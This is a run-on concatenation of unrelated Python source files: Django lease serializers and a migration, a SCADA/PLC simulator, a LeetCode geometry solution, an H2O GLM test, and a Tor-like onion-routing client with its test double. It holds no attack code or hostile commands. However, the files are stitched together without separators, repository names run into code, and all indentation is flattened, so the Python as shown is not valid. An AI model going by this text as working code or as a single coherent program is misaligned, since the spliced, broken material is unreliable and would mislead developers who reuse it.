if accumulator is None: accumulator = [] accumulator.append(to_lease_id) result = set() predecessors = RelatedLease.objects.filter(to_lease=to_lease_id).select_related('to_lease', 'from_lease') if predecessors: for predecessor in predecessors: result.add(predecessor) if predecessor.from_lease_id == predecessor.to_lease_id: continue if predecessor.from_lease_id in accumulator: continue result.update(get_related_lease_predecessors(predecessor.from_lease_id, accumulator)) return result def get_related_leases(obj): # Immediate successors related_to_leases = set(RelatedLease.objects.filter(from_lease=obj).select_related('to_lease', 'from_lease')) # All predecessors related_from_leases = get_related_lease_predecessors(obj.id) return { 'related_to': RelatedToLeaseSerializer(related_to_leases, many=True).data, 'related_from': RelatedFromLeaseSerializer(related_from_leases, many=True).data, } class LeaseRetrieveSerializer(LeaseSerializerBase): related_leases = serializers.SerializerMethodField() preparer = UserSerializer() infill_development_compensations = serializers.SerializerMethodField() email_logs = serializers.SerializerMethodField() area_notes = serializers.SerializerMethodField() matching_basis_of_rents = serializers.SerializerMethodField() def get_related_leases(self, obj): return get_related_leases(obj) def override_permission_check_field_name(self, field_name): if field_name == 'infill_development_compensations': return 'infill_development_compensation_leases' if field_name in ('area_notes', 'email_logs'): return 'lease_areas' return field_name def get_infill_development_compensations(self, obj): infill_development_compensations = InfillDevelopmentCompensation.objects.filter( infill_development_compensation_leases__lease__id=obj.id) return [{'id': idc.id, 'name': idc.name} for idc in infill_development_compensations] def get_email_logs(self, obj): from leasing.serializers.email import EmailLogSerializer lease_content_type = ContentType.objects.get_for_model(obj) email_logs = EmailLog.objects.filter(content_type=lease_content_type, object_id=obj.id) return EmailLogSerializer(email_logs, many=True).data def get_area_notes(self, obj): from leasing.serializers.area_note import AreaNoteSerializer area_notes = None combined_area = obj.lease_areas.aggregate(union=Union("geometry"))["union"] if combined_area: area_notes = AreaNote.objects.filter(geometry__intersects=combined_area) return AreaNoteSerializer(area_notes, many=True).data def get_matching_basis_of_rents(self, obj): from leasing.serializers.basis_of_rent import BasisOfRentSerializer q = Q() property_identifiers = obj.lease_areas.values_list("identifier", flat=True) if property_identifiers: q = Q(property_identifiers__identifier__in=property_identifiers) combined_area = obj.lease_areas.aggregate(union=Union("geometry"))["union"] if combined_area: q |= Q(geometry__intersects=combined_area) if not q: return [] return BasisOfRentSerializer(BasisOfRent.objects.filter(q), many=True).data class Meta: model = Lease fields = '__all__' exclude = None class LeaseUpdateSerializer(UpdateNestedMixin, EnumSupportSerializerMixin, FieldPermissionsSerializerMixin, serializers.ModelSerializer): id = serializers.ReadOnlyField() identifier = LeaseIdentifierSerializer(read_only=True) tenants = TenantCreateUpdateSerializer(many=True, required=False, allow_null=True) lease_areas = LeaseAreaCreateUpdateSerializer(many=True, required=False, allow_null=True) lessor = InstanceDictPrimaryKeyRelatedField(instance_class=Contact, queryset=Contact.objects.filter(is_lessor=True), related_serializer=ContactSerializer, required=False, allow_null=True) contracts = ContractCreateUpdateSerializer(many=True, required=False, allow_null=True) decisions = DecisionCreateUpdateNestedSerializer(many=True, required=False, allow_null=True) inspections = InspectionSerializer(many=True, required=False, allow_null=True) rents = RentCreateUpdateSerializer(many=True, required=False, allow_null=True) basis_of_rents = LeaseBasisOfRentCreateUpdateSerializer(many=True, required=False, allow_null=True) preparer = InstanceDictPrimaryKeyRelatedField(instance_class=User, queryset=User.objects.all(), related_serializer=UserSerializer, required=False, allow_null=True) related_leases = serializers.SerializerMethodField() notice_period = serializers.PrimaryKeyRelatedField( required=False, allow_null=True, queryset=NoticePeriod.objects.all().annotate( duration_as_interval=Cast('duration', DurationField())).order_by('duration_as_interval')) invoice_notes = InvoiceNoteCreateUpdateSerializer(many=True, required=False, allow_null=True) def get_related_leases(self, obj): return get_related_leases(obj) class Meta: model = Lease fields = '__all__' read_only_fields = ('is_invoicing_enabled', 'is_rent_info_complete') class LeaseCreateSerializer(LeaseUpdateSerializer): relate_to = serializers.PrimaryKeyRelatedField(required=False, allow_null=True, queryset=Lease.objects.all()) relation_type = EnumField(required=False, allow_null=True, enum=LeaseRelationType) def override_permission_check_field_name(self, field_name): if field_name in ('relate_to', 'relation_type'): return 'related_leases' return field_name class Meta: model = Lease fields = '__all__' read_only_fields = ('is_invoicing_enabled', 'is_rent_info_complete') agent/migrations/0002_agent_sexe.py # Generated by Django 3.1.7 on 2021-07-18 22:52 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('agent', '0001_initial'), ] operations = [ migrations.AddField( model_name='agent', name='sexe', field=models.CharField(choices=[('Homme', 'Homme'), ('Femme', 'Femme')], default='', max_length=30), preserve_default=False, ), ] import argparse import csv import os.path import random import signal import sqlite3 import sys import time from collections import OrderedDict from datetime import datetime from decimal import Decimal from pathlib import Path import yaml from basePLC import BasePLC from py2_logger import get_logger import threading import thread class Error(Exception): """Base class for exceptions in this module.""" class TagDoesNotExist(Error): """Raised when tag you are looking for does not exist""" class InvalidControlValue(Error): """Raised when tag you are looking for does not exist""" class DatabaseError(Error): """Raised when not being able to connect to the database""" class GenericScada(BasePLC): """ This class represents a scada. This scada knows what plcs it is collecting data from by reading the yaml file at intermediate_yaml_path and looking at the plcs. """ DB_TRIES = 10 """Amount of times a db query will retry on a exception""" SCADA_CACHE_UPDATE_TIME = 2 """ Time in seconds the SCADA server updates its cache""" def __init__(self, intermediate_yaml_path): with intermediate_yaml_path.open() as yaml_file: self.intermediate_yaml = yaml.load(yaml_file, Loader=yaml.FullLoader) self.logger = get_logger(self.intermediate_yaml['log_level']) self.output_path = Path(self.intermediate_yaml["output_path"]) / "scada_values.csv" self.output_path.touch(exist_ok=True) # Create state from db values state = { 'name': "plant", 'path': self.intermediate_yaml['db_path'] } # Create server, real tags are generated scada_server = { 'address': self.intermediate_yaml['scada']['local_ip'], 'tags': self.generate_real_tags(self.intermediate_yaml['plcs']) } # Create protocol scada_protocol = { 'name': 'enip', 'mode': 1, 'server': scada_server } self.plc_data = self.generate_plcs() self.saved_values = [['iteration', 'timestamp']] for PLC in self.intermediate_yaml['plcs']: if 'sensors' not in PLC: PLC['sensors'] = list() if 'actuators' not in PLC: PLC['actuators'] = list() self.saved_values[0].extend(PLC['sensors']) self.saved_values[0].extend(PLC['actuators']) self.update_cache_flag = False self.plcs_ready = False self.cache = {} for ip in self.plc_data: self.cache[ip] = [0] * len(self.plc_data[ip]) self.do_super_construction(scada_protocol, state) def do_super_construction(self, scada_protocol, state): """ Function that performs the super constructor call to SCADAServer Introduced to better facilitate testing """ super(GenericScada, self).__init__(name='scada', state=state, protocol=scada_protocol) @staticmethod def generate_real_tags(plcs): """ Generates real tags with all sensors and actuators attached to plcs in the network. :param plcs: list of plcs """ real_tags = [] for plc in plcs: if 'sensors' not in plc: plc['sensors'] = list() if 'actuators' not in plc: plc['actuators'] = list() for sensor in plc['sensors']: if sensor != "": real_tags.append((sensor, 1, 'REAL')) for actuator in plc['actuators']: if actuator != "": real_tags.append((actuator, 1, 'REAL')) return tuple(real_tags) @staticmethod def generate_tags(taggable): """ Generates tags from a list of taggable entities (sensor or actuator) :param taggable: a list of strings containing names of things like tanks, pumps, and valves """ tags = [] if taggable: for tag in taggable: if tag and tag != "": tags.append((tag, 1)) return tags def pre_loop(self, sleep=0.5): """ The pre loop of a SCADA. In which setup actions are started. :param sleep: (Default value = 0.5) The time to sleep after setting everything up """ self.logger.debug('SCADA enters pre_loop') self.db_sleep_time = random.uniform(0.01, 0.1) signal.signal(signal.SIGINT, self.sigint_handler) signal.signal(signal.SIGTERM, self.sigint_handler) self.keep_updating_flag = True self.cache_update_process = None time.sleep(sleep) def db_query(self, query, write=False, parameters=None): """ Execute a query on the database On a :code:`sqlite3.OperationalError` it will retry with a max of :code:`DB_TRIES` tries. Before it reties, it will sleep for :code:`DB_SLEEP_TIME` seconds. This is necessary because of the limited concurrency in SQLite. :param query: The SQL query to execute in the db :type query: str :param write: Boolean flag to indicate if this query will write into the database :param parameters: The parameters to put in the query. This must be a tuple. :raise DatabaseError: When a :code:`sqlite3.OperationalError` is still raised after :code:`DB_TRIES` tries. """ for i in range(self.DB_TRIES): try: with sqlite3.connect(self.intermediate_yaml["db_path"]) as conn: cur = conn.cursor() if parameters: cur.execute(query, parameters) else: cur.execute(query) conn.commit() if not write: return cur.fetchone()[0] else: return except sqlite3.OperationalError as exc: self.logger.info( "Failed to connect to db with exception {exc}. Trying {i} more times.".format( exc=exc, i=self.DB_TRIES - i - 1)) time.sleep(self.db_sleep_time) self.logger.error("Failed to connect to db. Tried {i} times.".format(i=self.DB_TRIES)) raise DatabaseError("Failed to get master clock from database") def get_sync(self, flag): """ Get the sync flag of this plc. On a :code:`sqlite3.OperationalError` it will retry with a max of :code:`DB_TRIES` tries. Before it reties, it will sleep for :code:`DB_SLEEP_TIME` seconds. :return: False if physical process wants the plc to do a iteration, True if not. :raise DatabaseError: When a :code:`sqlite3.OperationalError` is still raised after :code:`DB_TRIES` tries. """ res = self.db_query("SELECT flag FROM sync WHERE name IS ?", False, ('scada',)) return res == flag def set_sync(self, flag): """ Set this plcs sync flag in the sync table. When this is 1, the physical process knows this plc finished the requested iteration. On a :code:`sqlite3.OperationalError` it will retry with a max of :code:`DB_TRIES` tries. Before it reties, it will sleep for :code:`DB_SLEEP_TIME` seconds. :param flag: True for sync to 1, False for sync to 0 :type flag: bool :raise DatabaseError: When a :code:`sqlite3.OperationalError` is still raised after :code:`DB_TRIES` tries. """ self.db_query("UPDATE sync SET flag=? WHERE name IS ?", True, (int(flag), 'scada',)) def stop_cache_update(self): self.update_cache_flag = False def sigint_handler(self, sig, frame): """ Shutdown protocol for the scada, writes the output before exiting. """ self.stop_cache_update() self.logger.debug("SCADA shutdown") self.write_output() sys.exit(0) def write_output(self): """ Writes the csv output of the scada """ with self.output_path.open(mode='wb') as output: writer = csv.writer(output) writer.writerows(self.saved_values) def generate_plcs(self): """ Generates a list of tuples, the first part being the ip of a PLC, and the second being a list of tags attached to that PLC. """ plcs = OrderedDict() for PLC in self.intermediate_yaml['plcs']: if 'sensors' not in PLC: PLC['sensors'] = list() if 'actuators' not in PLC: PLC['actuators'] = list() tags = [] tags.extend(self.generate_tags(PLC['sensors'])) tags.extend(self.generate_tags(PLC['actuators'])) plcs[PLC['public_ip']] = tags return plcs def get_master_clock(self): """ Get the value of the master clock of the physical process through the database. On a :code:`sqlite3.OperationalError` it will retry with a max of :code:`DB_TRIES` tries. Before it reties, it will sleep for :code:`DB_SLEEP_TIME` seconds. :return: Iteration in the physical process. :raise DatabaseError: When a :code:`sqlite3.OperationalError` is still raised after :code:`DB_TRIES` tries. """ master_time = self.db_query("SELECT time FROM master_time WHERE id IS 1", False, None) return master_time def update_cache(self, lock, cache_update_time): """ Update the cache of the scada by receiving all the required tags. When something cannot be received, the previous values are used. """ while self.update_cache_flag: for plc_ip in self.cache: try: values = self.receive_multiple(self.plc_data[plc_ip], plc_ip) with lock: self.cache[plc_ip] = values except Exception as e: self.logger.error( "PLC receive_multiple with tags {tags} from {ip} failed with exception '{e}'".format( tags=self.plc_data[plc_ip], ip=plc_ip, e=str(e))) time.sleep(cache_update_time) continue time.sleep(cache_update_time) def main_loop(self, sleep=0.5, test_break=False): """ The main loop of a PLC. In here all the controls will be applied. :param sleep: (Default value = 0.5) Not used :param test_break: (Default value = False) used for unit testing, breaks the loop after one iteration """ self.logger.debug("SCADA enters main_loop") lock = None while True: while not self.get_sync(0): time.sleep(self.db_sleep_time) self.set_sync(1) while not self.get_sync(2): pass # Wait until we acquire the first sync before polling the PLCs if not self.plcs_ready: self.plcs_ready = True self.update_cache_flag = True self.logger.debug("SCADA starting update cache thread") lock = threading.Lock() thread.start_new_thread(self.update_cache, (lock, self.SCADA_CACHE_UPDATE_TIME)) master_time = self.get_master_clock() results = [master_time, datetime.now()] with lock: for plc_ip in self.plc_data: results.extend(self.cache[plc_ip]) self.saved_values.append(results) # Save scada_values.csv when needed if 'saving_interval' in self.intermediate_yaml and master_time != 0 and \ master_time % self.intermediate_yaml['saving_interval'] == 0: self.write_output() self.set_sync(3) if test_break: break def is_valid_file(parser_instance, arg): """ Verifies whether the intermediate yaml path is valid. :param parser_instance: instance of argparser :param arg: the path to check """ if not os.path.exists(arg): parser_instance.error(arg + " does not exist.") else: return arg if __name__ == "__main__": parser = argparse.ArgumentParser(description='Start everything for a scada') parser.add_argument(dest="intermediate_yaml", help="intermediate yaml file", metavar="FILE", type=lambda x: is_valid_file(parser, x)) args = parser.parse_args() plc = GenericScada(intermediate_yaml_path=Path(args.intermediate_yaml))dennislblog/codingsrc/1232-check_straight_line.py class Solution(object): def checkStraightLine(self, coordinates): """ :type coordinates: List[List[int]] :rtype: bool @ 问题: 判断是否是一条直线 """ # 直接看 d(y-y0) * d(x1-x0) == d(x-x0) * d(y1-y0) dy = coordinates[1][1] - coordinates[0][1] dx = coordinates[1][0] - coordinates[0][0] for i in range(2, len(coordinates)): dyp = coordinates[i][1] - coordinates[0][1] dxp = coordinates[i][0] - coordinates[0][0] if dy * dxp != dx * dyp: return False return True0:13.36import unittest, random, sys, time sys.path.extend(['.','..','../..','py']) import h2o, h2o_cmd, h2o_import as h2i, h2o_exec, h2o_glm, h2o_gbm, h2o_exec as h2e class Basic(unittest.TestCase): def tearDown(self): h2o.check_sandbox_for_errors() @classmethod def setUpClass(cls): h2o.init(java_heap_GB=10) @classmethod def tearDownClass(cls): h2o.tear_down_cloud() def test_GLM2_tmp(self): importFolderPath = "/tmp" csvFilename = 's.csv' bcFilename = 'bc.csv' csvPathname = importFolderPath + "/" + csvFilename bcPathname = importFolderPath + "/" + bcFilename hex_key = csvFilename + ".hex" bc_key = bcFilename + ".hex" # Parse parseResult = h2i.import_parse(path=csvPathname, schema='put', hex_key=hex_key, timeoutSecs=180) inspect = h2o_cmd.runInspect(key=hex_key) print "\n" + csvPathname, \ " numRows:", "{:,}".format(inspect['numRows']), \ " numCols:", "{:,}".format(inspect['numCols']) bcResult = h2i.import_parse(path=bcPathname, schema='put', hex_key=bc_key, timeoutSecs=180) inspect = h2o_cmd.runInspect(key=bc_key) print "\n" + bcPathname, \ " numRows:", "{:,}".format(inspect['numRows']), \ " numCols:", "{:,}".format(inspect['numCols']) # Split Test/Train************************************************ # how many rows for each pct? numRows = inspect['numRows'] trainDataKey = hex_key testDataKey = hex_key # GLM, predict, CM*******************************************************8 kwargs = { 'response': "response", 'non_negative': 0, 'standardize': 1, 'strong_rules': 1, 'alpha': 0, 'max_iter': 100, 'lambda_min_ratio': -1, 'higher_accuracy': 1, 'beta_constraints': bc_key, 'link': "family_default", 'use_all_factor_levels': 0, 'variable_importances': 0, 'lambda': 0, 'prior': 0.00301875221383974, 'nlambdas': -1, 'source': hex_key, 'lambda_search': 0, 'disable_line_search': 0, 'n_folds': 0, 'family': "binomial", 'beta_epsilon': 1e-04, 'intercept': 1, 'max_predictors': -1, # "used_cols"': "4,5,18,37,38,53,66,73,90,93,95,96,112,117,135,158,165,166,168,177,180", # 'ignored_cols': "1,2,3,4,5,6,7,8,9,11,12,14,15,16,17,18,19,20,21,22,23,24,25,26,27,29,31,32,34,35,36,37,38,40,41,42,43,44,45,46,47,48,49,51,52,53,54,55,56,57,58,59,60,61,62,63,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,91,92,93,94,95,96,97,98,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,119,120,121,123,124,125,126,128,129,133,134,135,136,137,138,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,173,174,176,177,178,179", } timeoutSecs = 180 for trial in range(10): parseKey = trainDataKey # GLM **********************************************8 start = time.time() glm = h2o_cmd.runGLM(parseResult=parseResult, timeoutSecs=timeoutSecs, pollTimeoutSecs=180, **kwargs) print "glm end on ", parseResult['destination_key'], 'took', time.time() - start, 'seconds' h2o_glm.simpleCheckGLM(self, glm, None, **kwargs) modelKey = glm['glm_model']['_key'] # Score ********************************************** predictKey = 'Predict.hex' start = time.time() predictResult = h2o_cmd.runPredict( data_key=testDataKey, model_key=modelKey, destination_key=predictKey, timeoutSecs=timeoutSecs) predictCMResult = h2o.nodes[0].predict_confusion_matrix( actual=testDataKey, vactual='response', predict=predictKey, vpredict='predict', ) cm = predictCMResult['cm'] # These will move into the h2o_gbm.py pctWrong = h2o_gbm.pp_cm_summary(cm); self.assertLess(pctWrong, 8,"Should see less than 7% error") print "\nTest\n==========\n" print h2o_gbm.pp_cm(cm) print "Trial #", trial, "completed" if __name__ == '__main__': h2o.unit_main() wtglover/TOR0 from Crypt import Crypt, Symmetric import logging import socket from os import urandom from Crypto.PublicKey import RSA import struct import sys from threading import Lock tri_logger = logging.getLogger("TorRouterInterface") tri_logger.setLevel(logging.INFO) ch = logging.StreamHandler() ch.setLevel(logging.INFO) formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s') ch.setFormatter(formatter) tri_logger.addHandler(ch) class Onion(object): def __init__(self, sid, crypt, next_onion=None): self.sid = sid self.crypt = crypt self.client_symkey = Symmetric.generate() self.client_sym = Symmetric(self.client_symkey, sid) self.next_onion = next_onion def wrap(self, pkt, status): payload = self.crypt.sign_and_encrypt("CLNT" + self.sid + self.client_symkey) if not self.next_onion: payload += self.client_sym.encrypt_payload(pkt, status) else: next_request = self.next_onion.wrap(pkt, status) payload += self.client_sym.encrypt_payload(next_request, status) return payload def unwrap(self, onion): crypt_header, header, body = self.client_sym.unpack_payload(onion) self.client_sym.absorb_crypto_header(crypt_header) l, status = self.client_sym.decrypt_header(header) if status != "OKOK": raise CircuitFailed tri_logger.debug("PO - Status: %s, len: %d wanted, %d recvd" % (status, l, len(body))) body = self.client_sym.decrypt_body(body) if not self.next_onion: return body return self.next_onion.unwrap(body) class CircuitFailed(Exception): pass class TorRouterInterface(object): CT_BLOCK_SIZE = 256 HEADER_SIZE = 2 * CT_BLOCK_SIZE def __init__(self, (pkt, ip, port, router_pubkey, sid, symkey), next_router=None, is_entry=False): """TorRouterInterface Interface to Tor Router circuit Args: (pkt (str), ip (str), port (int), router_pubkey (RSA key), symkey (str)): Router information returned by TorPathingServer interface next_router (TorRouterInterface - optional): Next Tor router to wrap/peel onion. Must include unless router is exit node is_entry (bool - optional): Set to True if router is entry node """ self.pkt = pkt self.ipp = (ip, port) self.router_pubkey = router_pubkey self.sid = sid self.client_symkey = symkey self.resp_symkey = symkey self.next_symkey = None self.prev_symkey = None self.next_router = next_router self.is_entry = is_entry self.is_exit = False if next_router else True self.client_key = Crypt().generate_key() self.crypt = Crypt(public_key=router_pubkey, private_key=self.client_key, name="interface%d" % port) self.client_sym = Symmetric(self.client_symkey, sid) self.db_mutex = Lock() self.established = False def lock_interface(func): """function wrapper for functions that require db access""" def func_wrap(self, *args): """acquire and release dbMuted if available""" # if self.db_mutex: self.db_mutex.acquire() result = None e = None try: result = func(self, *args) except: e = sys.exc_info() pass finally: self.db_mutex.release() if e: raise e[0], e[1], e[2] return result return func_wrap def _keep_alive(self): pass # TODO: add keep alive def _connect(self): s = socket.socket() s.connect(self.ipp) return s def _pull(self, s, length): message = '' while len(message) < length: message += s.recv(length - len(message)) return message def _recv(self, s): resp_sym = Symmetric(self.resp_symkey) headers = self._pull(s, resp_sym.CRYPT_HEADER_LEN + resp_sym.HEADER_LEN) crypt_header, header, _ = resp_sym.unpack_payload(headers) resp_sym.absorb_crypto_header(crypt_header) l, status = resp_sym.decrypt_header(header) return resp_sym.decrypt_body(self._pull(s, l)) def peel_onion(self, onion): crypt_header, header, body = self.client_sym.unpack_payload(onion) self.client_sym.absorb_crypto_header(crypt_header) l, status = self.client_sym.decrypt_header(header) if status != "OKOK": raise CircuitFailed tri_logger.debug("PO - Status: %s, len: %d wanted, %d recvd" % (status, l, len(body))) body = self.client_sym.decrypt_body(body) if self.is_exit: return body return self.next_router.peel_onion(body) @lock_interface def establish_circuit(self, prev_symkey=None): """establish_circuit Establishes a Tor circuit Args: prev_symkey (str - optional): symkey of last Tor router - do not set externally Raises: CircuitFailed: If connection to circuit failed """ self.prev_symkey = prev_symkey or self.client_symkey payload = self.pkt if self.is_exit: header = self.client_key.publickey().exportKey("DER") header += struct.pack(">16s16s4sl", prev_symkey, "\x00" * 16, "\x00" * 4, -1) payload += self.client_sym.encrypt_payload(header, "EXIT") else: self.next_symkey = self.client_sym.generate() header = self.client_key.publickey().exportKey("DER") next_payload = self.next_router.establish_circuit(self.next_symkey) header += struct.pack(">16s16s4sL%ds" % len(next_payload), self.prev_symkey, self.next_symkey, socket.inet_aton(self.next_router.ipp[0]), self.next_router.ipp[1], next_payload) payload += self.client_sym.encrypt_payload(header, "ESTB") if not self.is_entry: return payload tri_logger.debug("Connecting to %s:%d for circuit establishment" % self.ipp) s = self._connect() s.sendall(payload) response = self._recv(s) s.close() self.peel_onion(response) self.established = True # @lock_interface def build_onion(self): if self.is_exit: return Onion(self.sid, self.crypt) return Onion(self.sid, self.crypt, self.next_router.build_onion()) # @lock_interface def make_request(self, url, request): """make_request Sends a request to a target url through the Tor network and returns the response Args: url (str): Top level URL of target server formatted as "IP:PORT" request (str): Body of request to target server Returns: (str): Plaintext response from server Raises: CircuitFailed: If connection to circuit failed """ if not self.established: raise CircuitFailed url_port = url.split(":") ip = socket.gethostbyname(url_port[0]) port = int(url_port[1]) if len(url_port) == 2 else 80 onion = self.build_onion() exit_pkt = struct.pack(">4sl%ds" % len(request), socket.inet_aton(ip), port, request) payload = onion.wrap(exit_pkt, "SEND") tri_logger.info("Requesting %s:%d" % (ip, port)) s = self._connect() s.send(payload) response = self._recv(s) s.close() return onion.unwrap(response) @lock_interface def close_circuit(self): """close_circuit Closes the established Tor circuit - must do before exiting Raises: CircuitFailed: If connection to circuit failed """ # generate new client symkey # self.client_symkey = urandom(16) # self.client_sym = Symmetric(self.client_symkey, self.sid) onion = self.build_onion() payload = onion.wrap("", "EXIT") tri_logger.info("Closing circuit") s = self._connect() s.sendall(payload) response = self._recv(s) s.close() self.established = False return onion.unwrap(response) class TestTorRouterInterface(object): CT_BLOCK_SIZE = 256 HEADER_SIZE = 2 * CT_BLOCK_SIZE def __init__(self, (pkt, ip, port, tor_pubkey, sid, symkey), next_router=None, is_entry=False, is_exit=False, router_key=None, server_pubkey=None): self.pkt = pkt self.ipp = (ip, port) self.tor_pubkey = tor_pubkey self.sid = sid self.client_symkey = symkey self.next_symkey = None self.prev_symkey = None self.next_router = next_router self.is_entry = is_entry self.is_exit = is_exit self.router_key = router_key self.client_key = Crypt().generate_key() self.server_pubkey = server_pubkey self.local_crypt = Crypt(public_key=router_key.publickey(), private_key=self.client_key, name="local%d" % port, debug=True) self.router_crypt = Crypt(public_key=self.client_key.publickey(), private_key=self.router_key, name="router%d" % port, debug=True) self.server_crypt = Crypt(public_key=server_pubkey, private_key=self.router_key, name="server%d" % port, debug=True) def _keep_alive(self): pass def _handle_establishment(self, payload): pkt, (crypt_header, header, body) = payload[:512], Symmetric().unpack_payload(payload[512:]) data, hsh = self.server_crypt.decrypt(pkt) self.server_crypt.auth(data, hsh) method, rid, self.recv_sid, symkey = data[:4], data[4:20], data[20:28], data[28:44] client_sym = Symmetric(symkey, self.recv_sid) client_sym.absorb_crypto_header(crypt_header) l, status = client_sym.decrypt_header(header) tri_logger.debug("HE - Status: %s, len: %d wanted, %d recvd" % (status, l, len(body))) body = client_sym.decrypt_body(body) der_len = Crypt().PUB_DER_LEN raw_clientkey, self.recv_prev_symkey, self.recv_next_symkey, next_payload = \ body[:der_len], \ body[der_len:der_len + 16], \ body[der_len + 16:der_len + 32], \ body[der_len + 32:] self.recv_client_key = RSA.importKey(raw_clientkey) if self.is_exit: response = '' else: response = self.next_router._handle_establishment(next_payload) next_sym = Symmetric(self.recv_next_symkey) crypt_header, header, body = client_sym.unpack_payload(response) next_sym.absorb_crypto_header(crypt_header) l, status = next_sym.decrypt_header(header) tri_logger.debug("H2 - Status: %s, len: %d wanted, %d recvd" % (status, l, len(body))) response = next_sym.decrypt_body(body) response = client_sym.encrypt_payload(response, "OKOK") return Symmetric(self.recv_prev_symkey).encrypt_payload(response, "OKOK") def establish_circuit(self, prev_symkey=None): sym = Symmetric(self.client_symkey, self.sid) self.prev_symkey = prev_symkey or self.client_symkey if self.is_exit: payload = self.pkt payload += sym.encrypt_payload(self.client_key.publickey().exportKey("DER") + prev_symkey, "EXIT") else: payload = self.pkt self.next_symkey = sym.generate() next_payload = self.next_router.establish_circuit(self.next_symkey) payload += sym.encrypt_payload(self.client_key.publickey().exportKey("DER") + self.prev_symkey + self.next_symkey + next_payload, "ESTB") if not self.is_entry: return payload response = self._handle_establishment(payload) self.resp_symkey = self.client_symkey resp_sym = Symmetric(self.resp_symkey) crypt_header, header, body = resp_sym.unpack_payload(response) resp_sym.absorb_crypto_header(crypt_header) l, status = resp_sym.decrypt_header(header) tri_logger.debug("EC - Status: %s, len: %d wanted, %d recvd" % (status, l, len(body))) body = resp_sym.decrypt_body(body) return self.peel_onion(body) def peel_onion(self, onion): sym = Symmetric(self.client_symkey, self.sid) crypt_header, header, body = sym.unpack_payload(onion) sym.absorb_crypto_header(crypt_header) l, status = sym.decrypt_header(header) tri_logger.debug("PO - Status: %s, len: %d wanted, %d recvd" % (status, l, len(body))) body = sym.decrypt_body(body) if self.is_exit: return body return self.next_router.peel_onion(body) def _handle_request(self, payload): pkt, (crypt_header, header, body) = payload[:512], Symmetric().unpack_payload(payload[512:]) data, hash = self.router_crypt.decrypt(pkt) self.router_crypt.auth(data, hash) method, sid, symkey = data[:4], data[4:12], data[12:] assert sid == self.recv_sid client_sym = Symmetric(symkey, sid) client_sym.absorb_crypto_header(crypt_header) l, status = client_sym.decrypt_header(header) tri_logger.debug("HR - Status: %s, len: %d wanted, %d recvd" % (status, l, len(body))) body = client_sym.decrypt_body(body) if self.is_exit: ip_raw, port, request = struct.unpack("!4sI%ds" % (len(body) - 8), body) ip = socket.inet_ntoa(ip_raw) s = socket.socket() s.connect((ip, port)) s.sendall(request) s.settimeout(1) chunk = "asdf" payload = "" need_data = True while len(chunk) > 0 or need_data: try: chunk = s.recv(1024) except socket.timeout: chunk = '' except socket.error: payload += chunk break tri_logger.debug("Received chunk from website (%dB)" % len(chunk)) payload += chunk if len(chunk) > 0: need_data = False return_sym = Symmetric(self.recv_prev_symkey) payload = client_sym.encrypt_payload(payload, "OKOK") return return_sym.encrypt_payload(payload, "OKOK") response = self.next_router._handle_request(body) next_sym = Symmetric(self.recv_next_symkey) crypt_header, header, body = client_sym.unpack_payload(response) # print response next_sym.absorb_crypto_header(crypt_header) l, status = next_sym.decrypt_header(header) tri_logger.debug("HR - Status: %s, len: %d wanted, %d recvd" % (status, l, len(body))) response = next_sym.decrypt_body(body) response = client_sym.encrypt_payload(response, "OKOK") ret = Symmetric(self.recv_prev_symkey).encrypt_payload(response, "OKOK") return ret def make_request(self, url, request): url_port = url.split(":") ip = socket.gethostbyname(url_port[0]) port = int(url_port[1]) if len(url_port) == 2 else 80 tri_logger.info("Requesting %s:%d" % (ip, port)) # generate new client symkey self.client_symkey = urandom(16) client_sym = Symmetric(self.client_symkey, self.sid) if self.is_exit: payload = self.local_crypt.sign_and_encrypt("CLNT" + self.sid + self.client_symkey) port_bs = struct.pack("!I", port) payload += client_sym.encrypt_payload(socket.inet_aton(ip) + port_bs + request, "SEND") else: payload = self.local_crypt.sign_and_encrypt("CLNT" + self.sid + self.client_symkey) # print payload.encode("hex")[16:32] next_request = self.next_router.make_request(url, request) # print self.ipp[1], len(payload) # print ("CLNT" + self.sid + self.client_symkey).encode('hex') payload += client_sym.encrypt_payload(next_request, "SEND") if not self.is_entry: return payload tri_logger.info("Sending packet") response = self._handle_request(payload) resp_sym = Symmetric(self.resp_symkey) crypt_header, header, body = resp_sym.unpack_payload(response) # print "5", self.ipp[1], self.client_symkey.encode('hex') resp_sym.absorb_crypto_header(crypt_header) l, status = resp_sym.decrypt_header(header) tri_logger.debug("MR - Status: %s, len: %d wanted, %d recvd" % (status, l, len(body))) body = resp_sym.decrypt_body(body) return self.peel_onion(body) def _handle_close(self, payload): pkt, (crypt_header, header, body) = payload[:512], Symmetric().unpack_payload(payload[512:]) data, hash = self.router_crypt.decrypt(pkt) self.router_crypt.auth(data, hash) method, sid, symkey = data[:4], data[4:12], data[12:] assert sid == self.recv_sid client_sym = Symmetric(symkey, sid) client_sym.absorb_crypto_header(crypt_header) l, status = client_sym.decrypt_header(header) tri_logger.debug("HC - Status: %s, len: %d wanted, %d recvd" % (status, l, len(body))) body = client_sym.decrypt_body(body) if self.is_exit: return_sym = Symmetric(self.recv_prev_symkey) payload = client_sym.encrypt_payload("", "EXIT") return return_sym.encrypt_payload(payload, "EXIT") response = self.next_router._handle_close(body) next_sym = Symmetric(self.recv_next_symkey) crypt_header, header, body = client_sym.unpack_payload(response) next_sym.absorb_crypto_header(crypt_header) l, status = next_sym.decrypt_header(header) tri_logger.debug("HR - Status: %s, len: %d wanted, %d recvd" % (status, l, len(body))) response = next_sym.decrypt_body(body) response = client_sym.encrypt_payload(response, "EXIT") return Symmetric(self.recv_prev_symkey).encrypt_payload(response, "EXIT") def close_circuit(self): # generate new client symkey self.client_symkey = urandom(16) client_sym = Symmetric(self.client_symkey, self.sid) if self.is_exit: payload = self.local_crypt.sign_and_encrypt("CLNT" + self.sid + self.client_symkey) payload += client_sym.encrypt_payload("", "EXIT") else: payload = self.local_crypt.sign_and_encrypt("CLNT" + self.sid + self.client_symkey) next_request = self.next_router.close_circuit() payload += client_sym.encrypt_payload(next_request, "EXIT") if not self.is_entry: return payload tri_logger.info("Sending packet") response = self._handle_close(payload) resp_sym = Symmetric(self.resp_symkey) crypt_header, header, body = resp_sym.unpack_payload(response) # print "5", self.ipp[1], 